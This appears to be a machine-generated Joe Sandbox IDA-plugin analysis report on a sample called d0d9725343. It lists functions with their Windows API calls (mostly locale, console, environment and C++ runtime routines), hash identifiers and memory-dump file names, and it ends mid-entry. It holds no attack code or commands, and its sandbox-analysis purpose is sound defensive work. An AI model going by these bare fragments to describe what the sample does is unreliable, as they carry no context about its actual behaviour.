                                                                                                                                                                                                                                              • Instruction ID: 7778c6b44372914fe2606d0bce66292efc9175391aa13ec27ac44f5ac819a325
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 483843484cca9f9752ec7b9297caed2a81f7a51c282571c77643a41ce0c9a538
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8921B471914730AFC710EF98F949A1AB3E0EF48325F45845DE4494B361DB30AD60CF82
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023A9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0023C231,?,00000000,-00000008), ref: 0023AA42
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0024075A
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00240761
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0024079B
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 002407A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                                                                                              • Opcode ID: e3824bfdb4535487acc42efd6ab16611d16ad1c5d765ead2838e4a18e6b56273
                                                                                                                                                                                                                                              • Instruction ID: bceea2b83b997b7ea5a9749e4e910759b1070b35eb8c1f1b3a2de761d491e223
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3824bfdb4535487acc42efd6ab16611d16ad1c5d765ead2838e4a18e6b56273
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7321A171624206AF9B14AF61D8C496BF7A9EF10368B508518FE1597251D770FCA0CFA1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 21d9ad8b8a412da9e1b005557dcfadcce85f5c1992efe935bc6668eca2255594
                                                                                                                                                                                                                                              • Instruction ID: 1ac56fedd84d32df12bd9151c288462f69a777cf28fc4f7e2607a6d48a20b448
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21d9ad8b8a412da9e1b005557dcfadcce85f5c1992efe935bc6668eca2255594
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5021BEF122420AAFCB10AFA4DCE596BB7ADEF04368F108915F81597151EB30EC618BB0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00241AF4
                                                                                                                                                                                                                                                • Part of subcall function 0023A9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0023C231,?,00000000,-00000008), ref: 0023AA42
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00241B2C
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00241B4C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                                                                                              • Opcode ID: 4bb7140d8dd8e752c60805b53f78319606ed33f1cac2d3bf646f7258bb3e77ee
                                                                                                                                                                                                                                              • Instruction ID: 65efe5835619236b0ffa65926228dd2a055bd6d94e61df83b9585612fd117e87
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bb7140d8dd8e752c60805b53f78319606ed33f1cac2d3bf646f7258bb3e77ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5511C4E1A316157E67162B716C8EC7F79ACDEA57E9B100438F40191101FE708E718A71
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0022CB31
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022CB3B
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0022CB52
                                                                                                                                                                                                                                                • Part of subcall function 0022A613: std::_Lockit::_Lockit.LIBCPMT ref: 0022A624
                                                                                                                                                                                                                                                • Part of subcall function 0022A613: std::_Lockit::~_Lockit.LIBCPMT ref: 0022A63E
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022CBAC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1383202999-0
                                                                                                                                                                                                                                              • Opcode ID: 31e70956de11d88cb2ee004fa510f7577b248aafa27e6d1ba063aa0ca3be17c1
                                                                                                                                                                                                                                              • Instruction ID: db33604ada947b5e92e7716320e5123fb7a2e5ad26bdcfa3e07cc34ead4eb46c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31e70956de11d88cb2ee004fa510f7577b248aafa27e6d1ba063aa0ca3be17c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD11AC3182422AABCB05EFE4F95A6BDB764AB48724F244449E8016B281CF709A208F91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00248EBF,00000000,00000001,00000000,?,?,00242CBC,?,00000000,00000000), ref: 002499E7
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00248EBF,00000000,00000001,00000000,?,?,00242CBC,?,00000000,00000000,?,?,?,00242602,00000000), ref: 002499F3
                                                                                                                                                                                                                                                • Part of subcall function 00249A44: CloseHandle.KERNEL32(FFFFFFFE,00249A03,?,00248EBF,00000000,00000001,00000000,?,?,00242CBC,?,00000000,00000000,?,?), ref: 00249A54
                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 00249A03
                                                                                                                                                                                                                                                • Part of subcall function 00249A25: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002499C1,00248EAC,?,?,00242CBC,?,00000000,00000000,?), ref: 00249A38
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00248EBF,00000000,00000001,00000000,?,?,00242CBC,?,00000000,00000000,?), ref: 00249A18
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                              • Opcode ID: 008b3d7a7ef3e2f49da9e6ce3c851317dd8b570b613e76803d1d0af584396d38
                                                                                                                                                                                                                                              • Instruction ID: 40f9523bff42e77d20b49605d6da0cb7a4e5f5c308bd65659232e8c6b6e1499d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 008b3d7a7ef3e2f49da9e6ce3c851317dd8b570b613e76803d1d0af584396d38
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BF01C36810225BBCF226F91FC0898A3F66FB487F2F104050FE0985260C63289A0EB94
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0022E5D9
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0022E5E8
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0022E5F1
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0022E5FE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: ec0f8bae370f097fde38fad3cb74dbc3d6163c678463f77edeeac9e18d8f8055
                                                                                                                                                                                                                                              • Instruction ID: ee312b392c0bdd85f112b5f8a5257208007f1f92d65a2d5c7fd06e5d3daff368
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec0f8bae370f097fde38fad3cb74dbc3d6163c678463f77edeeac9e18d8f8055
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACF0B230C1020DEBCB00DBB4E94999EBBF4FF1C205BA19595E412F7510E730AB448B50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0023A251,?,?,00000000,00000000,00000000,?), ref: 0023A375
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                              • Opcode ID: 0a080d29b5906a29972da48cd67b808019a3cfc3e1dd28721bfb578e65574641
                                                                                                                                                                                                                                              • Instruction ID: 13d9088983654332702fab67442e9646e2b234b93adcee036108cf3e4b9788b4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a080d29b5906a29972da48cd67b808019a3cfc3e1dd28721bfb578e65574641
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09418DB191020AEFCF15DF98CC85AEEBBB6BF08300F1481A8FA4566221D3759960DF51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00239E33
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                              • Opcode ID: a500f2f9b7a2f021e1c9fe87bd48ea05508851c026e99cf615046da901a018e7
                                                                                                                                                                                                                                              • Instruction ID: f6889d251fbea1dc4b07d9e76cd03c2ff86d710aecd0bc3a9887e8de06332b45
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a500f2f9b7a2f021e1c9fe87bd48ea05508851c026e99cf615046da901a018e7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F13194B64302169BCF269F54C8449AA7BA9FF0A315F14815AF99489121C3B3DCF1DF91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: GetctypeLockitLockit::_std::_
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 2423992667-3882152299
                                                                                                                                                                                                                                              • Opcode ID: d24a249bed61b72535b4b94558e409c0983e9c43acd5e00e79938e08bdadb03a
                                                                                                                                                                                                                                              • Instruction ID: 1e96ca049d61e6395f136ad5264178447fcaef67c0f3bb80dee1003eaf84ac53
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d24a249bed61b72535b4b94558e409c0983e9c43acd5e00e79938e08bdadb03a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0531F2B0918384ABE310DF64D85531BBBE4AFE4308F04491CF5884B242E7B6E5A8CBD3
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(00000000,?,0023CF02), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000,?,?,00000028,00236E76), ref: 0023ABC9
                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0023FCDA
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0023FD18
                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0023FD2B
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0023FD73
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0023FD8E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                              • String ID: l#%
                                                                                                                                                                                                                                              • API String ID: 415426439-1260472432
                                                                                                                                                                                                                                              • Opcode ID: 32e7166b4a608d3e0bae68e87b027c658c496da2546aab08758bb254d0012f85
                                                                                                                                                                                                                                              • Instruction ID: d1aba0faf34b52430b2da69562b5266d8ca43c1e2bd3da071beeab26615abcac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32e7166b4a608d3e0bae68e87b027c658c496da2546aab08758bb254d0012f85
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66517FB2E2020AAFDF51DFA5ED45ABAB7B8FF04701F04447AE901E7191E7709D608B61
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00221000: _strlen.LIBCMT ref: 00221067
                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00221BE1
                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00221C07
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00221C16
                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00221C84
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00221E83
                                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00221EE0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseFileHandle_strlen$MessagePostQuitReadSize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2365707584-0
                                                                                                                                                                                                                                              • Opcode ID: 038e44bbdcc765ba403832d10e330f2a57b8f1d33c49648e92dfca83de2954a4
                                                                                                                                                                                                                                              • Instruction ID: 523c54e84acf6899f5ee67360669bb5fb4de767b994e69c06bad99ad1d4436b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 038e44bbdcc765ba403832d10e330f2a57b8f1d33c49648e92dfca83de2954a4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60918872924321ABC314DF64EC85A2BBBE5FF99350F15092DF8858B351E730D960CB92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,0023FD08,00000002,00000000,?,?,?,0023FD08,?,00000000), ref: 002403D0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,0023FD08,00000002,00000000,?,?,?,0023FD08,?,00000000), ref: 002403F9
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,0023FD08,?,00000000), ref: 0024040E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                              • Opcode ID: 4711fbdecce08e71b696ca5f893d6d3b8123cacb02c6868fd96eff5f13a18153
                                                                                                                                                                                                                                              • Instruction ID: 3607185362b69787539f3fcae801306e22a4790441d240fe2431702df1dd7bd6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4711fbdecce08e71b696ca5f893d6d3b8123cacb02c6868fd96eff5f13a18153
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A21CB32A30202A7D73DCF24D885A9B7FA6AF54B54B5680B4EB0AD7111E732DED1C390
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
